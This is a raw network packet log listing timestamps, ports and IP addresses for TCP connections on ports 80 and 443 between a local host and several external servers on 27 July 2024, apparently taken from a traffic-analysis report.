Jul 27, 2024 07:44:16.068821907 CEST	80	62262	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:16.068913937 CEST	62262	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:16.069024086 CEST	62262	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:16.069046974 CEST	62262	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:16.073981047 CEST	80	62262	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:16.074012041 CEST	80	62262	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:16.165855885 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:16.165982962 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:16.168596029 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:16.168622971 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:16.168685913 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:16.168698072 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:16.169164896 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:16.169325113 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:16.212527990 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:17.139601946 CEST	80	62262	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:17.144654036 CEST	80	62262	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:17.145989895 CEST	62262	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:17.145989895 CEST	62262	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:17.148369074 CEST	62265	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:17.151097059 CEST	80	62262	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:17.153439045 CEST	80	62265	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:17.153639078 CEST	62265	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:17.153639078 CEST	62265	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:17.153639078 CEST	62265	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:17.158651114 CEST	80	62265	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:17.158663988 CEST	80	62265	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:17.523976088 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:17.524085045 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:17.524137974 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:17.541423082 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:17.541460037 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:17.541491985 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:17.541508913 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:17.677012920 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:17.677110910 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:17.677386045 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:17.677594900 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:17.677633047 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:18.214370966 CEST	80	62265	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:18.214428902 CEST	80	62265	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:18.214509964 CEST	62265	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:18.214653969 CEST	62265	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:18.217145920 CEST	62267	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:18.219619989 CEST	80	62265	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:18.222292900 CEST	80	62267	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:18.222369909 CEST	62267	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:18.222484112 CEST	62267	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:18.222517967 CEST	62267	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:18.234003067 CEST	80	62267	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:18.234033108 CEST	80	62267	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:18.278248072 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:18.278361082 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:18.280975103 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:18.281003952 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:18.281116009 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:18.281127930 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:18.281187057 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:18.281197071 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:18.281357050 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:18.281506062 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:18.328541040 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:19.266546965 CEST	80	62267	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:19.266593933 CEST	80	62267	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:19.266654968 CEST	62267	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:19.267373085 CEST	62267	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:19.269470930 CEST	62269	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:19.272460938 CEST	80	62267	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:19.275218010 CEST	80	62269	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:19.275294065 CEST	62269	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:19.275391102 CEST	62269	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:19.275424957 CEST	62269	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:19.280824900 CEST	80	62269	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:19.281866074 CEST	80	62269	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:19.641740084 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:19.641916990 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:19.641987085 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:19.658195972 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:19.658245087 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:19.658277988 CEST	62266	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:19.658293962 CEST	443	62266	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:19.765201092 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:19.765280962 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:19.765639067 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:19.766061068 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:19.766143084 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:20.305691004 CEST	80	62269	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:20.306282043 CEST	80	62269	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:20.306652069 CEST	62269	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:20.307320118 CEST	62269	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:20.314136982 CEST	80	62269	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:20.317681074 CEST	62271	80	192.168.2.4	109.172.114.212
Jul 27, 2024 07:44:20.324129105 CEST	80	62271	109.172.114.212	192.168.2.4
Jul 27, 2024 07:44:20.324250937 CEST	62271	80	192.168.2.4	109.172.114.212
Jul 27, 2024 07:44:20.324352026 CEST	62271	80	192.168.2.4	109.172.114.212
Jul 27, 2024 07:44:20.331393003 CEST	80	62271	109.172.114.212	192.168.2.4
Jul 27, 2024 07:44:20.451103926 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:20.451206923 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:20.453347921 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:20.453375101 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:20.453610897 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:20.453624010 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:20.454215050 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:20.454361916 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:20.496535063 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:21.647135019 CEST	62271	80	192.168.2.4	109.172.114.212
Jul 27, 2024 07:44:21.652762890 CEST	62273	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:22.510418892 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:22.510601044 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:22.510843992 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:22.511948109 CEST	80	62273	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:22.512042046 CEST	62273	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:22.575118065 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:22.575186014 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:22.575222015 CEST	62270	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:22.575241089 CEST	443	62270	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:22.575361013 CEST	62273	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:22.575361013 CEST	62273	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:22.582752943 CEST	80	62273	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:22.584930897 CEST	80	62273	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:22.690865993 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:22.690953970 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:22.691025972 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:22.692178011 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:22.692214966 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:22.701564074 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:22.701648951 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:22.701904058 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:22.729296923 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:22.729334116 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.225742102 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.225826025 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:23.230540991 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:23.230570078 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.230992079 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.271507978 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:23.297148943 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:23.297291994 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:23.298193932 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:23.299855947 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:23.299882889 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:23.299932957 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:23.299946070 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:23.300244093 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:23.300518990 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:23.344491005 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.344522953 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:23.527791977 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.527914047 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.527971029 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:23.528011084 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.528130054 CEST	443	62275	104.26.2.16	192.168.2.4
Jul 27, 2024 07:44:23.528179884 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:23.587059021 CEST	80	62273	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:23.587157965 CEST	80	62273	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:23.587218046 CEST	62273	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:23.587341070 CEST	62273	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:23.592235088 CEST	80	62273	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:23.743612051 CEST	62275	443	192.168.2.4	104.26.2.16
Jul 27, 2024 07:44:24.638061047 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:24.638118982 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:24.638190985 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:24.640929937 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:24.640961885 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:24.645673990 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:24.645823002 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:24.645912886 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:24.664148092 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:24.664201975 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:24.664246082 CEST	62274	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:24.664263010 CEST	443	62274	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:24.775132895 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:24.775212049 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:24.775854111 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:24.776220083 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:24.776252985 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:25.274668932 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.274775982 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.279820919 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.279844999 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.280253887 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.321255922 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.333612919 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.333612919 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.333852053 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.402453899 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:25.402525902 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:25.404145002 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:25.408588886 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:25.408622980 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:25.414736986 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:25.414810896 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:25.418529034 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:25.418546915 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:25.418673992 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:25.418679953 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:25.418885946 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:25.419064999 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:25.419086933 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:25.719100952 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.719217062 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.719289064 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.721252918 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.721296072 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.721323967 CEST	62277	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.721339941 CEST	443	62277	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.754017115 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.754097939 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:25.754198074 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.754511118 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:25.754549026 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.379286051 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.379378080 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.380697966 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.380728006 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.381087065 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.382180929 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.382220984 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.382318020 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.386584997 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.386670113 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.388859034 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.388890982 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.389307022 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.394874096 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.436542034 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.638642073 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:26.639066935 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:26.639144897 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:26.655854940 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:26.655904055 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:26.655932903 CEST	62278	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:26.655949116 CEST	443	62278	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:26.688457966 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.688673019 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.688743114 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.688801050 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.694979906 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.695034981 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.695050001 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.695107937 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.701802015 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.701873064 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.759434938 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:26.759457111 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:26.760807037 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:26.761619091 CEST	62281	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:26.761631012 CEST	443	62281	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:26.781435013 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.781553030 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.781559944 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.781619072 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.781656027 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.781661034 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.781723976 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.781749010 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.781817913 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.782635927 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.782705069 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.790518045 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.790610075 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.796191931 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.796276093 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.806879044 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.806963921 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.807363987 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.807434082 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.807478905 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.807518005 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.807543039 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.807560921 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.807610035 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.807647943 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.808022022 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.808079004 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.808094025 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.808155060 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.808167934 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.808267117 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.809812069 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.809824944 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.811933041 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.811996937 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.812247992 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.812303066 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.812316895 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.822577000 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.822649002 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.873457909 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.873532057 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.873827934 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.873891115 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.874496937 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.874563932 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.876082897 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.876142979 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.876209021 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.876270056 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.876295090 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.876354933 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.877194881 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.877257109 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.878031015 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.878094912 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.883347988 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.883408070 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.888871908 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.888941050 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.893893957 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.893961906 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.895848989 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.895919085 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.896344900 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.896384001 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.896410942 CEST	62280	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:26.896425962 CEST	443	62280	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:26.896962881 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.897023916 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.900567055 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.900633097 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.906965971 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.907027006 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.910228968 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.910291910 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.966207981 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.966304064 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.966331005 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.966357946 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.966388941 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.966439009 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.966566086 CEST	443	62279	31.14.70.245	192.168.2.4
Jul 27, 2024 07:44:26.966624022 CEST	62279	443	192.168.2.4	31.14.70.245
Jul 27, 2024 07:44:26.966624022 CEST	62279	443	192.168.2.4	31.14.70.245
